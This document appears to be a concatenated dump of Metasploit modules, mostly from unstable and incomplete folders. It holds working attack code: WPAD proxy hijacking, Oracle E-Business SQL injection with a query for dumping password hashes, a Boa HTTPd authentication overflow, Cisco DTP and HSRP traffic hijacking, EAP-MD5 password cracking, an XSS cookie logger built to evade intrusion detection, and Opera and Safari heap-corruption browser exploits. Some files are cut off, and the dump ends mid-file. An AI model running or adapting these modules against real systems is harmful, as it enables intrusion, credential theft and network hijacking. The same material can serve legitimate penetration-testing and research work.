13 | 14 | class Metasploit3 < Msf::Auxiliary 15 | include Msf::Exploit::Remote::HttpServer 16 | 17 | def initialize(info = {}) 18 | super(update_info(info, 19 | 'Name' => 'WPAD/PAC Proxy Config Server', 20 | 'Description' => %q{ 21 | This module facilitates serving up a preconfigured WPAD.DAT 22 | file. This is useful when using the nbns_response module 23 | to configure clients to use a specified proxy. 24 | 25 | If DEFUALT is set to 'BYPASS' DOMAINS is a list of domains 26 | that the victim will redirect to the proxy. If DEFAULT is 27 | set to 'INTERCEPT' DOMAINS is a list of domains that the victim 28 | will not send through the proxy. 29 | 30 | The SKIPSSL option can be used to not intercept sites using 31 | HTTPS, this is useful for avoiding invalid certificate errors. 32 | }, 33 | 'Author' => 34 | [ 35 | 'Spencer McIntyre', 36 | 'SecureState R&I Team', # SecureState Research and Innovation Team 37 | ], 38 | 'License' => MSF_LICENSE, 39 | 'DefaultOptions' => 40 | { 41 | 'SRVPORT' => 80, 42 | 'URIPATH' => '/wpad.dat' 43 | }, 44 | 'Actions' => 45 | [ 46 | [ 'Service' ] 47 | ], 48 | 'PassiveActions' => [ 'Service' ], 49 | 'DefaultAction' => 'Service' 50 | )) 51 | deregister_options('SSL', 'SSLCert', 'SSLVersion', 'URIPATH') 52 | register_options( 53 | [ 54 | OptString.new('PROXYHOST', [ true, 'Host for victims to use as a proxy', nil ]), 55 | OptInt.new('PROXYPORT', [ true, 'Port for victims to use as a proxy', 8080 ]), 56 | OptString.new('DOMAINS', [ false, 'Comma seperated list of domains to handle differently', '' ]), 57 | OptString.new('DEFAULT', [ false, 'Default action for domains not specified (INTERCEPT or BYPASS)', 'INTERCEPT']), 58 | OptBool.new('SKIPSSL', [ true, 'Do not proxy requests for HTTPS resources', true ]), 59 | ], self.class) 60 | end 61 | 62 | def run 63 | default = datastore['DEFAULT'].upcase 64 | if (default != 'INTERCEPT') and (default != 'BYPASS') 65 | print_error("DEFAULT must be either INTERCEPT or BYPASS") 66 | return 67 | end 68 | @wpad_data = create_wpad_file(datastore['PROXYHOST'], datastore['PROXYPORT'], datastore['DOMAINS'], default, datastore['SKIPSSL']) 69 | exploit 70 | end 71 | 72 | # Handle incoming requests from the server 73 | def on_request_uri(cli, request) 74 | send_response(cli, @wpad_data, { 'Content-Type' => "application/x-ns-proxy-autoconfig" } ) 75 | end 76 | 77 | def create_wpad_file(proxy_server, proxy_port, domains, default, skipssl) 78 | if domains == nil 79 | domains = [] 80 | else 81 | domains = domains.split(',') 82 | end 83 | if default == "INTERCEPT" 84 | non_default = "DIRECT" 85 | else 86 | non_default = "PROXY #{proxy_server}:#{proxy_port}" 87 | end 88 | 89 | wpad = "function FindProxyForURL(url, host)\n" 90 | wpad << "{\n" 91 | if skipssl 92 | wpad << "if (url.substring(0, 6) == \"https:\") { return \"DIRECT\"; }\n" 93 | end 94 | 95 | for domain in domains 96 | wpad << "if (dnsDomainIs(host, \"#{domain}\")) { return \"#{non_default}\"; }\n" 97 | end 98 | 99 | if default == "INTERCEPT" 100 | wpad << "return \"PROXY #{proxy_server}:#{proxy_port}\";\n" 101 | else 102 | wpad << "return \"DIRECT\";\n" 103 | end 104 | wpad << "}\n" 105 | wpad 106 | end 107 | end 108 | -------------------------------------------------------------------------------- /modules/auxiliary/sqli/oracle_erp_sqli1.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/projects/Framework/ 6 | ## 7 | #######################oracle_ebusiness_suite_sqli############################ 8 | 9 | require 'msf/core' 10 | 11 | class Metasploit3 < Msf::Auxiliary 12 | 13 | include Msf::Auxiliary::Report 14 | include Msf::Exploit::Remote::HttpClient 15 | include Msf::Auxiliary::Scanner 16 | def initialize 17 | super( 18 | 'Name' => 'Oracle E-Business Suite SQL Injection 11.5.1-11.5.10.2.(R12)', 19 | 'Description' => %q{ 20 | This module makes a request to the Oracle Application Server (tested against Oracle HRMS [self service]) 21 | in an attempt to find some of the vulnerabilities described by Joxean Koret. It will also try to find DAD to be used with /pls/ 22 | }, 23 | 'Version' => '$Revision:$', 24 | 'References' => 25 | [ 26 | [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' 27 | ], 28 | ], 29 | 'Author' => [ 'KP' ], 30 | 'License' => MSF_LICENSE 31 | ) 32 | 33 | register_options([Opt::RPORT(8000),], self.class) 34 | end 35 | def run_host(ip) 36 | begin 37 | finddad = send_request_raw({ 38 | 'uri' => '/OA_HTML/biserror.jsp?DBC=DOESNOTEXIST', 39 | 'method' => 'GET', 40 | 'version' => '1.1', 41 | }, 5) 42 | 43 | if ( finddad.body =~ /pls/ ) 44 | sleep(2) 45 | tempdad = finddad.body.scan(/\/pls\/(.*)\//) 46 | report_note( 47 | :host => ip, 48 | :proto => 'tcp', 49 | :type => 'SERVICE_NAME', 50 | :data => "#{tempdad.uniq}" 51 | ) 52 | tempdad1 = $1 53 | tempdad2 = tempdad1.split("/") 54 | finaldad = tempdad2.first 55 | print_status("Discovered DAD: '#{finaldad}' for host #{ip}") 56 | else 57 | print_error("Unable to retrieve DAD for #{ip}...") 58 | end 59 | supplieruri = "/pls/#{finaldad}/ICXSUPWF.DISPLAYCONTACTS" 60 | print_status ("Looking for supplier infor at '#{supplieruri}'") 61 | findsupplier = send_request_raw({ 62 | 'uri' => "#{supplieruri}", 63 | 'method' => 'GET', 64 | 'version' => '1.1', 65 | }, 5) 66 | if ((findsupplier.body =~ /Supplier Contacts/) && (findsupplier.body =~ /Company Address/)) 67 | sleep(2) 68 | print_status("Supplier contacts found on '#{supplieruri}'") 69 | print_status("Find password hashes on 70 | '#{supplieruri}'?p_where=2>1%20union%20select%20username,password,null,null,null,null%20from%20dba_users;") 71 | else 72 | print_error("Supplier info not found") 73 | end 74 | 75 | rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout 76 | rescue ::Timeout::Error, ::Errno::EPIPE 77 | end 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/boa_auth_dos.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: boa_auth_dos.rb 15014 2012-06-06 15:13:11Z rapid7 $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # web site for more information on licensing and terms of use. 9 | # http://metasploit.com/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Auxiliary 15 | 16 | include Msf::Exploit::Remote::HttpClient 17 | include Msf::Auxiliary::Dos 18 | 19 | def initialize(info = {}) 20 | super(update_info(info, 21 | 'Name' => 'Boa HTTPd Basic Authentication Overflow', 22 | 'Description' => 23 | %q{ 24 | The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11 25 | allows denial of service or possibly authentication bypass 26 | via a Basic Authentication header with a user string greater than 127 characters. You must set 27 | the request URI to the directory that requires basic authentication. 28 | }, 29 | 'Author' => 30 | [ 31 | 'Luca "ikki" Carettoni ', #original discoverer 32 | 'Claudio "paper" Merloni ', #original discoverer 33 | 'Max Dietz ' #metasploit module 34 | ], 35 | 'License' => MSF_LICENSE, 36 | 'Version' => '$Revision$', 37 | 'References' => 38 | [ 39 | [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'], 40 | ], 41 | 'DisclosureDate' => 'Sep 10 2007')) 42 | 43 | register_options( 44 | [ 45 | Opt::RPORT(80), 46 | OptString.new('URI', [ true, "The request URI", '/']), 47 | OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass']) 48 | ], self.class) 49 | end 50 | 51 | def check 52 | begin 53 | res = send_request_cgi({ 54 | 'uri'=>'/', 55 | 'method'=>'GET' 56 | }) 57 | if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) 58 | print_status("Boa Version Detected: #{m[1]}") 59 | return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version 60 | return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) 61 | return Exploit::CheckCode::Vulnerable 62 | else 63 | print_status("Not a Boa Server!") 64 | return Exploit::CheckCode::Safe # not a boa server 65 | end 66 | rescue Rex::ConnectionRefused 67 | print_error("Connection refused by server.") 68 | return Exploit::CheckCode::Safe 69 | end 70 | end 71 | 72 | def run 73 | if check == Exploit::CheckCode::Vulnerable 74 | datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127) 75 | datastore['BasicAuthPass'] = datastore['PASSWORD'] 76 | res = send_request_cgi({ 77 | 'uri'=> datastore['URI'], 78 | 'method'=>'GET' 79 | }) 80 | if (res != nil) 81 | print_status("Server still operational... checking to see if password has been overwritten.") 82 | datastore['BasicAuthUser'] = 'admin' 83 | res = send_request_cgi({ 84 | 'uri'=>datastore['URI'], 85 | 'method'=>'GET' 86 | }) 87 | if (res.code == 200) 88 | print_status("Access successful with admin:#{datastore['PASSWORD']}") 89 | elsif (res.code != 401) 90 | print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered") 91 | else 92 | print_status("Access forbidden, this module has failed.") 93 | end 94 | else 95 | print_status("Denial of Service has succeeded.") 96 | end 97 | end 98 | end 99 | end 100 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/dtp.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | require 'racket' 14 | 15 | class Metasploit3 < Msf::Auxiliary 16 | 17 | include Msf::Exploit::Capture 18 | 19 | def initialize(info = {}) 20 | super(update_info(info, 21 | 'Name' => 'Forge Cisco DTP Packets', 22 | 'Description' => %q{ 23 | This module forges DTP packets to initialize a trunk port. 24 | }, 25 | 'Author' => [ 'Spencer McIntyre' ], 26 | 'License' => MSF_LICENSE, 27 | 'Version' => '$Revision$', 28 | 'Actions' => 29 | [ 30 | [ 'Service' ] 31 | ], 32 | 'PassiveActions' => 33 | [ 34 | 'Service' 35 | ], 36 | 'DefaultAction' => 'Service' 37 | )) 38 | register_options( 39 | [ 40 | OptString.new('DOMAIN', [ false, "DTP Domain Name", '']), 41 | OptString.new('IFACE', [ true, "Interface To Use", 'eth0']), 42 | ], self.class) 43 | end 44 | 45 | def run 46 | n = Racket::Racket.new 47 | @run = true 48 | domain = datastore['DOMAIN'] 49 | if domain == "" 50 | domain = "\x00\x00\x00\x00\x00\x00\x00\x00\x00" 51 | end 52 | 53 | n.l2 = Racket::L2::Ethernet.new() 54 | n.l2.dst_mac = '01:00:0c:cc:cc:cc' #this has to stay the same 55 | n.l2.ethertype = (domain.length + 34) 56 | 57 | n.l3 = Racket::L2::LLC.new() 58 | n.l3.control = 0x03 59 | n.l3.dsap = 0xaa 60 | n.l3.ssap = 0xaa 61 | cisco_vendor_code = "\x00\x00\x0c" 62 | pid = "\x20\x04" #2004 is DTP 63 | payload = cisco_vendor_code + pid 64 | 65 | #DTP info section 66 | dtp_version = "\x01" 67 | 68 | dtp_domain_type = "\x00\x01" 69 | dtp_domain_len = [ (domain.length + 5) ].pack("n") 70 | dtp_domain = domain + "\x00" 71 | dtp_domain_section = dtp_domain_type 72 | dtp_domain_section << dtp_domain_len 73 | dtp_domain_section << dtp_domain 74 | 75 | dtp_status_type = "\x00\x02" 76 | dtp_status_len = "\x00\x05" 77 | dtp_status = "\x03" 78 | dtp_status_section = dtp_status_type 79 | dtp_status_section << dtp_status_len 80 | dtp_status_section << dtp_status 81 | 82 | dtp_type_type = "\x00\x03" 83 | dtp_type_len = "\x00\x05" 84 | dtp_type = "\xa5" 85 | dtp_type_section = dtp_type_type 86 | dtp_type_section << dtp_type_len 87 | dtp_type_section << dtp_type 88 | 89 | dtp_neighbor_type = "\x00\x04" 90 | dtp_neighbor_len = "\x00\x0a" 91 | dtp_neighbor = "\x11\x22\x33\x44\x55\x66" 92 | dtp_neighbor_section = dtp_neighbor_type 93 | dtp_neighbor_section << dtp_neighbor_len 94 | dtp_neighbor_section << dtp_neighbor 95 | 96 | payload << dtp_version 97 | payload << dtp_domain_section 98 | payload << dtp_status_section 99 | payload << dtp_type_section 100 | payload << dtp_neighbor_section 101 | n.l3.payload = payload 102 | 103 | n.iface = datastore['IFACE'] 104 | n.pack() 105 | while @run 106 | n.send2() 107 | select(nil, nil, nil, 30) 108 | end 109 | 110 | end 111 | 112 | end 113 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/eap_md5_dict.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | require 'packetfu' 15 | 16 | class Metasploit3 < Msf::Auxiliary 17 | 18 | include Msf::Exploit::Capture 19 | include Msf::Auxiliary::Report 20 | 21 | def initialize 22 | super( 23 | 'Name' => 'EAP-MD5 challenge dictionary attack.', 24 | 'Description' => %q{ 25 | This module launch a dictionary attack against an EAP-MD5 challenge. 26 | The PCAP should contains at least the following requests: 27 | EAP reponse, identity (contains the username) 28 | EAP request, MD5-challenge 29 | EAP response, MD5-challenge 30 | EAP success (the module validate the authentication was succesful) 31 | 32 | Compatible with wired and 802.11 - 802.1x environments. 33 | }, 34 | 'Author' => 35 | [ 36 | 'pello ' 37 | ], 38 | 'License' => MSF_LICENSE, 39 | 'Version' => '$Revision$' 40 | ) 41 | 42 | begin 43 | require 'pcaprub' 44 | @@havepcap = true 45 | rescue ::LoadError 46 | @@havepcap = false 47 | end 48 | 49 | register_options( 50 | [ 51 | OptString.new('WORDLIST', [ true, "Wordlist file for challenge bruteforce.", '']) 52 | ], self.class) 53 | 54 | deregister_options('RHOST','NETMASK','TIMEOUT','FILTER','SNAPLEN','INTERFACE') 55 | 56 | end 57 | 58 | def find_eap_challenge 59 | eapinfo = Hash.new 60 | cap = PacketFu::PcapFile.new.f2a(:filename => datastore['PCAPFILE']) 61 | cap.each do |pkt| 62 | begin 63 | case pkt[30,4].unpack('H4').join 64 | when "888e" # 802.11 65 | if pkt[36].to_i == 2 and pkt[40].to_i == 4 66 | eapinfo['resp'] = pkt[42..(42 + pkt[41] - 1)] 67 | eapinfo['id'] = pkt[37] 68 | elsif pkt[36].to_i == 1 and pkt[40].to_i == 4 69 | eapinfo['req'] = pkt[42..(42 + pkt[41] - 1)] 70 | elsif pkt[36].to_i == 2 and pkt[40].to_i == 1 71 | eapinfo['user'] = pkt[42..(42 + pkt[41] - 1)] 72 | elsif pkt[36].to_i == 3 73 | eapinfo['status'] = true 74 | else 75 | next 76 | end 77 | end 78 | case pkt[12,4].unpack('H4').join 79 | when "888e" # 802.3 80 | if pkt[18].to_i == 2 and pkt[22].to_i == 4 81 | eapinfo['resp'] = pkt[24..(24 + pkt[23] - 1)] 82 | eapinfo['id'] = pkt[19] 83 | elsif pkt[18].to_i == 1 and pkt[22].to_i == 4 84 | eapinfo['req'] = pkt[24..(24 + pkt[23] - 1)] 85 | elsif pkt[18].to_i == 2 and pkt[22].to_i == 1 86 | eapinfo['user'] = pkt[24..(24 + pkt[23] - 1)] 87 | elsif pkt[18].to_i == 3 88 | eapinfo['status'] = true 89 | else 90 | next 91 | end 92 | end 93 | if data.length == 5 then break end 94 | rescue 95 | next 96 | end 97 | end 98 | eapinfo 99 | end 100 | 101 | def compare_challenge_and_passwords(reqchallenge, respchallenge, id, user) 102 | correctpass = "" 103 | print_status("Passwords loaded from #{datastore['WORDLIST']}") 104 | File.open(datastore['WORDLIST'],"r").each_line do |p| 105 | md5 = Rex::Text.md5(2.chr + p.rstrip + reqchallenge) 106 | if md5 == respchallenge.unpack('H2'*respchallenge.length).join 107 | correctpass = p 108 | break 109 | end 110 | end 111 | if correctpass.empty? 112 | print_error("Password not found.") 113 | else 114 | print_good("The login/password is: #{user}/#{correctpass}") 115 | report_note( 116 | :type => 'EAP-MD5', 117 | :user => user, 118 | :pass => correctpass) 119 | end 120 | 121 | end 122 | 123 | def run 124 | 125 | print_status("Looking for EAP-MD5 challenge in #{datastore['PCAPFILE']}") 126 | 127 | eap = find_eap_challenge 128 | if !defined? eap['req'] or !defined? eap['resp'] 129 | print_error("There is no EAP-MD5 challenge in the PCAP file") 130 | elsif !eap['status'] 131 | print_error("There is no succesful EAP-MD5 challenge in the PCAP file") 132 | else 133 | compare_challenge_and_passwords(eap['req'], eap['resp'], eap['id'], eap['user']) 134 | end 135 | 136 | end 137 | 138 | 139 | end 140 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/enum_bing_url.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | require 'msf/core' 9 | 10 | class Metasploit3 < Msf::Auxiliary 11 | 12 | include Msf::Auxiliary::Report 13 | include Msf::Auxiliary::Scanner 14 | include Msf::Exploit::Remote::Tcp 15 | 16 | def initialize(info = {}) 17 | super(update_info(info, 18 | 'Name' => 'Bing URL Enumerator', 19 | 'Description' => %q{ 20 | This module uses Bing to enumerate URLs from a specified range of IP addresses. 21 | }, 22 | 'Author' => [ 'Royce Davis ' ], 23 | 'License' => MSF_LICENSE 24 | )) 25 | 26 | deregister_options('RHOST','RPORT','VHOST') 27 | end 28 | 29 | def cleanup 30 | datastore['RHOST'] = @old_rhost 31 | datastore['RPORT'] = @old_rport 32 | end 33 | 34 | def run_host(ip) 35 | urls = [] 36 | @old_rhost = datastore['RHOST'] 37 | @old_rport = datastore['RPORT'] 38 | 39 | datastore['RHOST'] = 'www.bing.com' 40 | datastore['RPORT'] = 80 41 | 42 | # We cannot use HttpClient to send a query to bing.com, 43 | # because there is a bug in get_once that keeps bailing on us before finishing 44 | # getting the data. get_once is the actual function used to receive HTTP data 45 | # for send_request_cgi(). See the following ticket for details: 46 | # http://dev.metasploit.com/redmine/issues/6499#note-11 47 | connect 48 | req = %Q|GET /search?q=ip:#{ip} HTTP/1.1\nHost: #{datastore['RHOST']}\nAccept: */*\n 49 | | 50 | 51 | req = req.gsub(/^\t\t/, '') 52 | sock.put(req) 53 | res = sock.get(-1, 1) 54 | m = res.to_s.scan(/([a-z0-9]+(?:[\-\.])[a-z0-9]+(?:[\-\.])[a-z]{3,5})/) 55 | 56 | if m.empty? 57 | print_error("No matches found for #{ip}") 58 | return 59 | end 60 | 61 | m.each do |url| 62 | url = url.to_s.gsub(//, '') 63 | 64 | # The URL returns in the following format: 65 | # ["www.example.com"] 66 | if url =~ /\[\"(.+)\"\]/ 67 | urls << $1 68 | print_status("#{ip} = #{$1}") 69 | end 70 | end 71 | 72 | unless urls.empty? 73 | report_note( 74 | :host => ip, 75 | :data => urls, 76 | :type => 'URL' 77 | ) 78 | end 79 | end 80 | end 81 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/hsrp_hijack.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | require 'racket' 15 | 16 | class Metasploit3 < Msf::Auxiliary 17 | 18 | include Msf::Exploit::Capture 19 | 20 | def initialize 21 | super( 22 | 'Name' => 'Cisco HSRP traffic hijacking.', 23 | 'Description' => %q{ 24 | This module will direct LAN traffic to the attacker host if HSRP is present. 25 | }, 26 | 'Author' => [ 'pello' ], 27 | 'License' => MSF_LICENSE, 28 | 'Version' => '$Revision$' 29 | ) 30 | register_options( 31 | [ 32 | Opt::RPORT(1985), 33 | OptString.new('INTERFACE', [true, "The name of the interface", 'eth0']) 34 | ], self.class) 35 | 36 | deregister_options('PCAPFILE','SNAPLEN','FILTER') 37 | 38 | begin 39 | require 'pcaprub' 40 | @@havepcap = true 41 | rescue ::LoadError 42 | @@havepcap = false 43 | end 44 | end 45 | 46 | def hsrp_listen 47 | pcap = Pcap::open_live(datastore['INTERFACE'], 1500, false, 3) 48 | pcap.setfilter("host 224.0.0.2 and udp port 1985") 49 | begin 50 | print_status("Sniffing traffic.....") 51 | Timeout.timeout(3) do 52 | pcap.each do |pkt| 53 | eth = Racket::L2::Ethernet.new(pkt) 54 | ip = Racket::L3::IPv4.new(eth.payload) 55 | udp = Racket::L4::UDP.new(ip.payload) 56 | hsrp = Racket::L5::HSRP.new(udp.payload) 57 | @hsrp_group = hsrp.group 58 | @hsrp_vip = hsrp.vip 59 | @hsrp_password = hsrp.password 60 | return true 61 | end 62 | end 63 | rescue Timeout::Error 64 | return false 65 | end 66 | 67 | end 68 | 69 | def run 70 | 71 | raise "Pcaprub is not available" if not @@havepcap 72 | 73 | @run = false 74 | @hsrp_group = 1 75 | @hsrp_priority = 254 76 | @hsrp_vip = "" 77 | @hsrp_password = "cisco" 78 | 79 | if hsrp_listen 80 | print_status("Vip: " << @hsrp_vip << " Group: " << @hsrp_group.to_s << " Password: " << @hsrp_password) 81 | print_good("Start traffic hijacking.....") 82 | 83 | else 84 | print_error("No HSRP traffic.") 85 | return false 86 | end 87 | 88 | @run = true 89 | 90 | n = Racket::Racket.new 91 | n.l2 = Racket::L2::Ethernet.new 92 | n.l2.ethertype = 0x0800 93 | n.l2.dst_mac = "01:00:5e:00:00:02" 94 | n.l3 = Racket::L3::IPv4.new 95 | n.l3.src_ip = datastore['RHOST'] 96 | n.l3.dst_ip = "224.0.0.2" 97 | n.l3.protocol = 0x11 98 | n.l4 = Racket::L4::UDP.new 99 | n.l4.src_port = 1985 100 | n.l4.dst_port = 1985 101 | n.l5 = Racket::L5::HSRP.new 102 | n.l5.group = @hsrp_group 103 | n.l5.priority = @hsrp_priority 104 | n.l5.password = @hsrp_password 105 | n.l5.opcode = 0 106 | n.l5.state = 16 107 | n.l5.vip = @hsrp_vip 108 | 109 | n.l4.payload = n.l5 110 | n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) 111 | n.l4.payload = "" 112 | 113 | n.iface = datastore['INTERFACE'] 114 | n.pack() 115 | while @run 116 | n.send2() 117 | select(nil, nil, nil, 3) 118 | end 119 | 120 | end 121 | 122 | end 123 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/http_javascript_cookielogger.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # web site for more information on licensing and terms of use. 5 | # http://metasploit.com 6 | ## 7 | 8 | require 'msf/core' 9 | 10 | class Metasploit3 < Msf::Auxiliary 11 | 12 | include Msf::Exploit::Remote::HttpServer::HTML 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Capture: HTTP Logging Of Cookies', 17 | 'Description' => %q{ 18 | This module runs a webserver that serves a piece of javascript 19 | which will transmit cookies back to metasploit. In an attempt 20 | to evade analysis and Intrusion Detection Systems this module has 21 | an option to obfuscate the served javascript. 22 | To use this module the following javascript must be injected on a 23 | website vulnerable to XSS: 24 | 97 | | 98 | 99 | # Transmit the compressed response to the client 100 | send_response(cli, html, { 'Content-Type' => 'text/html' }) 101 | 102 | # Handle the payload 103 | handler(cli) 104 | 105 | end 106 | 107 | end 108 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/browser/opera_content_length.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = AverageRanking 16 | 17 | # 18 | # This module acts as an HTTP server 19 | # 20 | include Msf::Exploit::Remote::HttpServer::HTML 21 | 22 | def initialize(info = {}) 23 | super(update_info(info,{ 24 | 'Name' => '[INCOMPLETE] Opera <= 10.50 Content-Length Memory Corruption', 25 | 'Description' => %q{ 26 | This module triggers a vulnerability in Opera 10.50 and 10.10 that allows 27 | an attacker to specify the copy length for a memcpy(). See references for more 28 | information. 29 | 30 | In its current state, this module is only capable of causing a crash. With 31 | some heap sculpting it is reportedly possible to cause code execution instead. 32 | Unforatunately, I have not been able to achieve code exec yet :-/ 33 | }, 34 | 'License' => MSF_LICENSE, 35 | 'Author' => [ 'jduck' ], 36 | 'Version' => '$Revision$', 37 | 'References' => 38 | [ 39 | [ 'URL', 'http://www.hack0wn.com/view.php?xroot=672.0&cat=exploits' ], 40 | [ 'URL', 'http://secunia.com/blog/86/' ], 41 | [ 'URL', 'http://my.opera.com/securitygroup/blog/2010/03/09/the-malformed-content-length-header-security-issue' ] 42 | ], 43 | 'Payload' => 44 | { 45 | 'ExitFunc' => 'process', 46 | 'Space' => 2048, 47 | 'BadChars' => "", 48 | 'DisableNops' => true, 49 | }, 50 | 'Targets' => 51 | [ 52 | [ 'Opera 10.50 on Windows XP SP3', 53 | { 54 | 'Platform' => 'win', 55 | 'Arch' => ARCH_X86, 56 | 'Ret' => 0x0c0c0c0c, 57 | 'BlockLen' => 0x60000, 58 | 'Containers' => 800, 59 | } 60 | ], 61 | ], 62 | 'DisclosureDate' => 'Mar 03 2010', 63 | 'DefaultTarget' => 0 64 | })) 65 | end 66 | 67 | def on_request_uri(cli, request) 68 | print_status("Got request for: #{request.uri}") 69 | #print_status(request.inspect) 70 | 71 | # Re-generate the payload 72 | #return if ((p = regenerate_payload(cli)) == nil) 73 | 74 | 75 | # Send the trigger when requested.. 76 | if (request.uri =~ /boom$/) 77 | len = rand(0x7000) 78 | # below will force a crash every time 79 | #len = 0x0c0c0c0c 80 | print_status("Using length: %d" % len) 81 | 82 | bignum = 11111111111111111111 - 3047977415 83 | bignum += len 84 | 85 | content = "A" * 10240 86 | 87 | response = "" 88 | response << "HTTP/#{request.proto} 200 OK\r\n" 89 | response << "Content-Type: text/html\r\n" 90 | response << "Content-Length: #{bignum}\r\n" 91 | response << "\r\n" 92 | response << content 93 | 94 | print_status("Sending #{self.name} trigger to #{cli.peerhost}:#{cli.peerport}...") 95 | cli.put(response) 96 | 97 | return 98 | end 99 | 100 | 101 | # Otherwise, setup the heap to get pwnt... 102 | print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...") 103 | html = %Q| 104 | 105 | 106 | 131 | 132 | 133 | 134 | 135 | | 136 | 137 | trigger_url = get_resource() + '/boom' 138 | html.gsub!(/REPLACE_ME/, trigger_url) 139 | 140 | send_response_html(cli, html) 141 | 142 | handler(cli) 143 | end 144 | 145 | end 146 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/browser/safari_feedurl.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | 15 | 16 | class Metasploit3 < Msf::Exploit::Remote 17 | 18 | include Msf::Exploit::Remote::HttpServer::HTML 19 | include Msf::Exploit::Remote::BrowserAutopwn 20 | autopwn_info({ 21 | :ua_name => HttpClients::SAFARI, 22 | :javascript => true, 23 | :rank => NormalRanking, # reliable memory corruption 24 | :vuln_test => nil, 25 | }) 26 | 27 | def initialize(info = {}) 28 | super(update_info(info, 29 | 'Name' => '[INCOMPLETE] Safari libxml2 feed:// URL Heap Overflow', 30 | 'Description' => %q{ }, 31 | 'License' => BSD_LICENSE, 32 | 'Author' => [ 'egypt' ], 33 | 'Version' => '$Revision$', 34 | 'References' => 35 | [ 36 | ['BID', '31126'], 37 | ['CVE', '2008-3529'], 38 | ], 39 | 'Payload' => 40 | { 41 | 'Space' => 1024, 42 | 'BadChars' => "\x00", 43 | 'DisableNops' => true, 44 | }, 45 | 'Targets' => 46 | [ 47 | # Target 0: Automatic 48 | [ 49 | 'Windows Safari 3.2.1 via libxml2.dll', 50 | { 51 | # Addresses must be alphanumeric ascii 52 | 'Platform' => [ 'win' ], 53 | #'Ret' => 0x62306e38, # call eax; libxml2.dll 54 | #'Ret' => 0x62317666, # call ebx; libxml2.dll 55 | #'Ret' => 0x62315233, # call ecx; libxml2.dll 56 | #'Ret' => 0x62306e55, # call edx; libxml2.dll 57 | #'Ret' => 0x62334f4c, # call edi; libxml2.dll 58 | 'Ret' => 0x62353068, # call esi; libxml2.dll 59 | #'Ret' => 0x62314169, # call ebp; libxml2.dll 60 | #'Where' => 0x30313233, # Need a pointer that gets called 61 | 'Where' => 0x77ed73b4, # Need a pointer that gets called 62 | }, 63 | ], 64 | ], 65 | 'DefaultTarget' => 0)) 66 | end 67 | 68 | def on_request_uri(cli, request) 69 | # Re-generate the payload 70 | return if ((p = regenerate_payload(cli)) == nil) 71 | 72 | headers = { 73 | 'Cache-control' => 'must-revalidate', 74 | 'Expires' => '0' 75 | } 76 | case request.uri 77 | when get_resource() 78 | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 79 | 80 | content = "" 81 | content << "" 84 | content << "" 85 | when /feed/ 86 